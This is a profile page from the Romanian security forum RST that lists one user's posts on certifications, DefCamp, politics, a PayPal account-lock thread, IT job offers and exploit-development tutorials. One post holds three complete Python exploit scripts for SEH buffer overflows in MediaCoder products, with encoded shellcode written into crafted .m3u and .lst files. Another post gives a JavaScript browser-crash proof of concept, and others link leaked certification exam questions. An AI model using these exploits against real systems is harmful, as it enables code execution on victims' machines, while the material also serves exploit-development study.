-
Posts
879 -
Joined
-
Last visited
-
Days Won
24
Everything posted by neox
-
no comment
-
Da deja este talmes-balmes si eu am crezut ca asa o sa fie discutii legate de malware/exploits/etc, asa se umple si categoria asta cu spam direct cu link, trebuie ceva facut mai individual exemplu anatomia unei Malware,anatomia unui exploit etc..coduri analizate personal deci ceva individual, daca nu o sa ajunga si categoria asta cu posturi informative (SPAM ) pe carele gasesti ca nisipul pe plaja peste tot pe google etc... Cu exceptia tools sau programe de analizat sint binevenite,in general si tutoriale bune dar nu tot felul de rahaturi,deci sa speram ca nu se va posta numai sa fie la numar. Daca nu o sa iese geva de genul, gaseste tutoriale cu google=Malware Analysis Tutorials va fii postate aicia
-
Daca imi donezi un plaman nou si m-as putea lipsi de inhalator as veni din toata inima, serios am probleme cu sanatatea de 2 anii, la asa ceva in Romania as participa si eu mai ales ca acuma sint pensionar pe cale de boala
-
Respect Andrei si la toti organizatori care organizeaza Defcamp, ce as veni si eu daca as putea Mai ales subiectele care se discuta in program foarte interesant poate filmati si voi anul asta , in fie care an sper asta
-
Certified Ethical Hacker Slab de tot mi-ar fi rusine cu cursul asta zici ca te uiti la desene animate pe pdf lor, informati vechi slabe de tot asa ceva vezi mai rar si la bani care cer nu se compara cu alte cursuri CEH este slab si va ramine slab. CEH V 7 Intrebarile la examen daca va intereseza 312-50 V7.rar Voi ce pareri aveti ? cei care v-ati uitat peste versiunea 8
-
Discuti peste discuti dar voi uitati cati oameni mor acolo nevinovati, ceva trebuie sa se intample ca prea multi oameni mor. Despre Rusii pe ei nu intereseza citi oameni mor acolo atita timp cit fac vinzare arme cu siria si pe desupra Rusia urmareste si ia alte scopuri 1.De cind au fost alungati din Afganistan au pierdut suveranitatea in Asia centrala si lumea arabica prin urmare vor iara integrarea in lumea arabica . 2. Si Rusia si China nu sint de acord ca sa ii invadeze pe Siria pentru ca se gindesc ca daca aproape de noi fac Americani figuri poate ne vin si noua rindul o data ca la Siria. Am vazut mai sus niste discuti cu ce ne-au facut noua Rusi 1.Pentru cei care nu cunoaste istoria Noi am fost aliati cu nemti, am luptat inpotriva Rusilor la Stalingrad, noi cu nemti si italieni deci ce te astepti sa iti faca rusi tie sa iti dea flori de 8 martie asta a fost sa fie am meritat soarta . Cit despre SUA nu are rost sa vb parerea mea este ei sint cei mai mari teroristi pe planeta asta Concluzie pe nimeni nu ii intereseza citi oameni mor toti urmaresc numai interesele lor asa a fost asa o sa fie
-
Mersi de info Fi8sVrs Tare de tot proiectul si ai totul intr-un pachet fara se le cauti separat
-
Saltut la toti de pe rst Tutorialul 4 din Win32 Exploit Development video online/vimeo Win32 Exploit Development-04 on Vimeo Download Tools tools.rar Download Video+Tools http://www.mediafire.com/download/m2margbr1gpn862/Win32_Exploit_Development-04.rar
-
PayPal fixes critical account switcheroo bug after researcher tipoff
neox replied to Matt's topic in Stiri securitate
Citeste ce scrie in poza ca iti trimite e-mail pentru confirmare e-mail ieste cu o confirmare care este ca o inregistrare noua pe acelasi date personale -
PayPal fixes critical account switcheroo bug after researcher tipoff
neox replied to Matt's topic in Stiri securitate
mah_one pentru mine nu este bug ceea ce ai gasit tu nu ca nu iti respect munca ta deci sa nu te superi pe mine problema aia este se securitate de la paypal De exemplul: am patit de 2 ori asa ceva deci cum sa intimplat Am fost in ro acasa si eu am paypal de Germania si ma-m logat din ro cu ip de ro a mers am cumparat ceva de pe ocazii.ro pe urma ma sunat pe telefon fratele si ma intrebat daca mai am ceva taitei $ pe paypal si iam zis da am ,mia zis frate dami parola sa ma logez pe paypal de prietenul care sint acuma sa fac plata si imediat a inregistrat paypal alta clasa de ip si cum sa logat, la lasat sa logeze dar a aparut alea 2 intrebari secrete , ma sunat iara si ma intrebat raspunsul secret si nu am ma-i tinut minte exact ce am ales ca raspuns si am raspuns gresit si la blocat imediat si apare imaginea ce o ai tu in video Acia ai uitat sa precizezi ca primesti un e-mail pe adresa de mail care scrie ceva de genul asta contul a fost atacat bla bla si din mod de siguranta a fost pe durata scurta blocat si ai un link pe care apesi si deschide pagina ca la inregistrare nume , adresa , anul nasteri , contul de banca si asa mai departe sau te duci tu pe paypal si faci ca un fel de inregistrare si pe baza asta confirmi iara ca tu esti Asta nu insemana ca ai sters contul, la suspendat pentru ca a fost inregistrat ca atacat deia paypal nu iti recunoaste tie ca bug A doua oara tot asa am prea schimbat si experimentat in contul paypal si tot asa poza de sus si iara am primit e-mail si dedata asta am zis ia sa sun acolo la ei sa vedem ce zic si mia explicat ca o obtiune de siguranta . In video unde bagi tu e-mail adresa in al doilea cont si normal ca daca tu folosesti alta adresa de e-mail apare conflicte De exemplu tu bagi adresa dar atita tip cit tu nu poti confirma nu o poti folosi De exemplu bagi adresa mea paypal la tine in cont imediat il inregistreaza ca conflict sau chiar si atack si imi apare imediat cint eu ma logez imaginea de mai sus dar asta nu insemana ca tu mia sters mie contul de la paypal . Cine nu crede ce am zis eu blocativa contul cu pass gresit de exemplu si la intrebarea secreta nu raspundeti corect sa vedeti ca imediat apare imagine de sus si primesti e-mail ps. inca ceva cind mai faceti video cu demonstratie hack faceti si voi cu tot ce cuprinde in Desktop ceas,data si asa mai departe -
Eu am facut acum 4 ani de aicia in Germana http://www.fernschule-weber.de/lehrgang/ITSecurity/Lehrplan.pdf cam ce contine CISSP a costat 1500€ Ca intrebari este usor si greu depinde de memoria fiecaruia am cautat pe pc meu daca mai am formularele de la examen dar nu le mai am le-am sters dar daca vrei am de la EC-Council Licensed Penetration Tester formulare de la examen ca sa iti dai seama cam cum sint, ca asa a fost si CISSP ,daca vrei le incarc online ca sa vezi cum sint acuma fac upload aicia http://www.mediafire.com/download/5cqtbabanafufs0/LPT.rar Ca sa lucrezi in it industry headhunter ai nevoie de CISSP certificare
-
m-am uitat pe cartea Official (ISC)2 Guide to the CISSP CBK, - Hernandez CISSP, Steven dar slab de tot mult bla bla fara rost in fine va recomand cartea de jos pe toti care sint interesati de CISSP Shon Harris - CISSP All-in-One Exam Guide, 6th Edition - 2013.pdf https://docs.google.com/file/d/0B2mEedlVpcogeTFKTlZCUjRmNUE/edit
-
Securitatea la noi, si paginile web sunt ca infrastructura tari noastre praf
-
Doua proiecte Web Penetration Testing proiect 1 https://pentesterlab.com/exercises If you don't visit this website before or don't know about " like me " . This is best of the best Provide u with the exercise matrials . look at this example https://pentesterlab.com/from_sqli_to_shell_II.html Difficulty Intermediate Details This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. What you will learn? Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell Requirements A computer with a virtualisation software A good understanding of SQL A good understanding of HTTP A basic understanding of PHP Yes, that's it! Download https://pentesterlab.com/from_sqli_to_shell_II/from_sqli_to_shell_II.pdf https://pentesterlab.com/from_sqli_to_shell_II/from_sqli_to_shell_II.iso https://pentesterlab.com/from_sqli_to_shell_II/from_sqli_to_shell_II_i386.iso proiect 2 https://github.com/Audi-1 Videos Tagged for
-
pocul asta este de cand eram eu tanar folosesc toti la ori ce firefox,real player etc.. si todauna zic ca este o conceptie noua <html> <head> <script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </html>
-
Niste jigodie de Tari toate incepand de la cea mica la cea mare, nimeni nu comenteaza in fata la USA inafara de Rusi:) toate tarie se fac ca nu aude si nu stie ce sa intimplat,ce este trist ca omul Edward Snowden a spus adevarul si pe nimeni nu ii intereseza. Americani i-au anulat pasaportul lui Edward Snowden a cerut in 21 de tari azil politic si lau refuzat printre care si Germania care dau azil la toata lumea, care are probleme in tara lui sa le fie rusine la toti. tarile care a cerut azil politic Austria, Bolivia, Brazilia, China, Cuba, Finlanda, Fran?a, Germania, India, Italia, Irlanda, Olanda, Nicaragua, Norvegia, Polonia, Rusia, Spania, Elve?ia, Venezuela.etc... Rusi au zis ca ii da azil numia sa nu mai faca public alte documente secrete. Edward Snowden a solicitat azil politic VIDEO UPDATE Edward Snowden a solicitat azil politic in Norvegia - ministru/ Wikileaks: Snowden a cerut azil politic in 21 de tari - International - HotNews.ro
-
Vulscan is a module which enhances nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of different vulnerability databases. Nmap NSE Vulscan 1.0 Released
-
L-am testat si eu,servul ftp este varza este vurnerabil la toate comenzile astea commands=["USER","PASS","LIST","MKD","ABOR","CWD","ACCT","NSLT","DELE","APPE","PORT","PASV","NOOP", "AUTH","HOST","LANG","FEAT","RMD","SIZE","XRMD",",XPWD","XCRC","XCUP","TYPE","RNFR" Aproape toate comezile
-
Bine ai venit Dar ai stricat toata prezentarea cu titlul "Salut RST sunt leg3ndar " cam totdeauna au fost probleme cu legende Ma spart video asta leg3ndar atacked pentagon - YouTube
-
Degeaba ne strofocam toti pentru ca avem in ultimele zile mai multe exemple de spionare,ascultare telefon,skype,yahoo etc... Edward Snowden,Julian Assange a riscat mult ca se dea pret secrete si informati de la stat dar degeba nu vedeti ca pe nimeni nu ii intereseza, ma asteptam ca lumea sa iasa pe strada proteste in fata Ambasadelor pentru cacatul de ACTA au mai iesit ceva oameni pe starda dar sa stiti ca ce practica SUA,Anglia este mai periculos ca Acta acuma au observat SUA a lumea nu face scandal pentru cea ce au facut deja se gindesc cit sa investesca si mai mult sa spioneze.
-
da si eu cred ca in garaj au facut productele
-
Salut la toti baieti Azi nu am avut ce face si am dat de pagina asta MediaCoder - more than a universal audio/video transcoder - MediaCoder official website toate bune si frumoase dar nu am vazut programator asa prost ca asta Are urmatoarele producte: MediaCoder - Choose your MediaCoder edition Toate productele sunt vulnerabile mi-ar fi rusine pretul la producte :MediaCoder Premium - The fast and low-cost solution for cooperative transcoding applications All Mediacoder Product SEH Buffer Overflow format m3u #!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system("cls") os.system("color 3f") else: os.system("clear") print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:m3u [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "\x41" * 845 nseh = "\xEB\x06\xFF\xFF" seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = buffer + nseh + seh + nops + shell try: rst= open("All-MediaCoder.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error" All Mediacoder Product SEH Buffer Overflow format lst #!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system("cls") os.system("color 3f") else: os.system("clear") print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: [url=http://www.mediacoderhq.com/editions.html]MediaCoder - Choose your MediaCoder edition[/url] [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:lst [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "\x41" * 845 nseh = "\xEB\x06\xFF\xFF" seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = buffer + nseh + seh + nops + shell try: rst= open("All-MediaCoder.lst",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error" MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH) #!/usr/bin/python print """ [+]Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH) [+]Download link: http://www.mediacoderhq.com/device/mpx.htm [+]Vulnerable Product: MediaCoder (Personal Media Player) Edition [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ from struct import pack junk = "http://" + "\x41" * 765 nseh = "\xeb\x06\x90\x90" seh = pack('<I',0x66D81575)#66D81575 5F POP EDI avutil-52.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell=("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = junk + nseh + seh + nops + shell try: rst= open("mediacoder-pmp.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error" Audiocoder l-am facut inainte l-am gasit pe sofpedia nu am stiut ca apartine de Mediacoder Product https://rstforums.com/forum/68712-audiocoder-buffer-overflow-exploit-seh.rst
-
Saltut la toti de pe rst Tutorialul 3 din Win32 Exploit Development SEH Buffer Overflow https://imageshack.com/i/n1q7gp Download Video+Tools part1 Exploit dev3.part1.rar part2 Exploit dev3.part2.rar video online/vimeo Win32 Exploit Development-03 on Vimeo
-
Tipic ca in Romania "Absolvent al unei facultati" In afara conteaza mai mult certificarile ca facultatea, bineinteles ca daca o ai nu strica. Dar ca exemplu oferta de mai sus prea exagereaza ce cere e ca si cum ar spune avem un job dar nu sint sanse sa ocupi jobul respectiv. Parerea mea firme ce cere asa ceva merita sa dea faliment in Germania stii o categorie de exemplu administrare ajunge pentru angajare pe urma restul firma iti plateste pentru specializare in alte domeni binenteles ca faci prima data contract cu ei, in schimb in Romania iti cere din prima sa fii Ninja (mai bine daca te nasti Ninja ) Ca facultate in Germania cum ar fii informatica inveti numai baza pe urma te specializezi in domeniu care il doresti cum ar fii Security,Hacking,Web etc... Este iara posibil de exemplu esti de meserie zidar si ca hobby (Hacking/Security) si sa zicem ai o boala si nu mai poti practica meseria de zidarit te duci la camera de munca prezinti actele care dovedeste boala si ca nu mai poti practica . Camera de munca iti pune la dispozitie oferte sau ce vrei sa faci, si faci ce doresti Informatica de exemplu faci 3 ani si dai examen si ai pe urma aceiasi sansa ca si unul care a facut facultatea in Germana, le zice (Umsulung=scoala si dai examen ihk-abschluss= certificat ) la scoala asta, deci nu conteaz note sau alte prosti astea sint niste institute care te invata asa ceva deci numai specialisti. Info este pe germana dar sa vedeti ca nu vb prosti Umschulungen mit IHK-Abschluß Inca un exemplu asta este e-mail privat cu oferta de munca IT-Security Consultant Guten Tag Herr ......, RIGHTHEAD ist exklusiv mit der Rekrutierung eines IT-Security Consultant (m/w) für ein Unternehmen aus der Informationssicherheits-Branche für die Standorte Heilbronn, Burscheid, Hamburg oder Ismaning beauftragt. Wir sind auf Ihr Profil aufmerksam geworden, weil Sie über interessante Kenntnisse verfügen, unter anderem im Bereich IT-Security. IT-Security Consultant Ihre Aufgaben _Schwerpunktmäßig Durchführung technischer Sicherheitsüberprüfungen für große und mittelständische Unternehmen in Deutschland, Österreich und in der Schweiz _Arbeit mit gängigen Netzwerkauditierungswerkzeugen sowie Durchführung von manuellen Untersuchungen von Netzwerken, Sicherheitssystemen, Webanwendungen und ggf. WLAN- Umgebungen _Dokumentation der Ergebnisse der Überprüfungen und Vorstellung beim Kunden im Rahmen einer Präsentation _Optional können die Durchführung von Security Awareness Schulungen bei unseren Kunden sowie die aktive Teilnahme an relevanten Security Events Teil des Aufgabenbereiches sein _Planung und Umsetzung von IT-Security-Projekten in Deutschland, Österreich und der Schweiz bei großen und mittelständischen Unternehmen _Vor-Ort- und Remote-Unterstützung unserer Kunden beim Betrieb von Sicherheitslösungen Sie sind versiert in den Bereichen IT-Security und Netzwerk-Überprüfungen und haben starkes Interesse am Thema Penetrationtesting / Ethical Hacking. Unser Kunde bietet Ihnen folgende Vorteile: Unbefristete Festanstellung Weiterbildungs- und Weiterentwicklungsmöglichkeiten Attraktive Vergütung Firmenwagen zu uneingeschränkten Privatnutzung Firmenkreditkarte Eigenständigkeit und sehr hoher Verantwortungsbereich Bitte senden Sie uns Ihre Kontaktdaten, damit wir schnellstmöglich gemeinsam über die Position und Ihre Karrieremöglichkeiten sprechen können. Ich freue mich auf Ihr Feedback und wünsche Ihnen einen schönen Tag! Herzliche Grüße Verena ..... Senior Account Manager Human Resources RIGHTHEAD GmbH Agentur des BBDO Worldwide Network Großweidenmühlstraße 36 - 90419 Nürnberg Tel. +49-(0)911-9339-3558- Fax +49-(0)911-9339-1812 Mobil +49-(0)151 180 537 50 eMail: Karriere@RIGHTHEAD.de http://www.RIGHTHEAD.de Cerere realista nu exagerari, inca noi in ro traim in spatele lunii Nu am vrut sa fac dublu post si am modificat aicia Acum am observat am cautat sa vedem cit este Salariu 2500 -4000 lei/net in euro 555-888€ Scuze de expresie dar muisti ei nu se gandesc cati bani bagi sau cit ai cheltuit ca sa acumulezi informatie ce se cere pentru job, ei nu se gindesc citi bani a costat facultatea si cite cheltuit ai avut iti ofera salariu de sclav. Cum am zis firme destea merita sa dea faliment pentru ca habar nu au pe ce planeta traim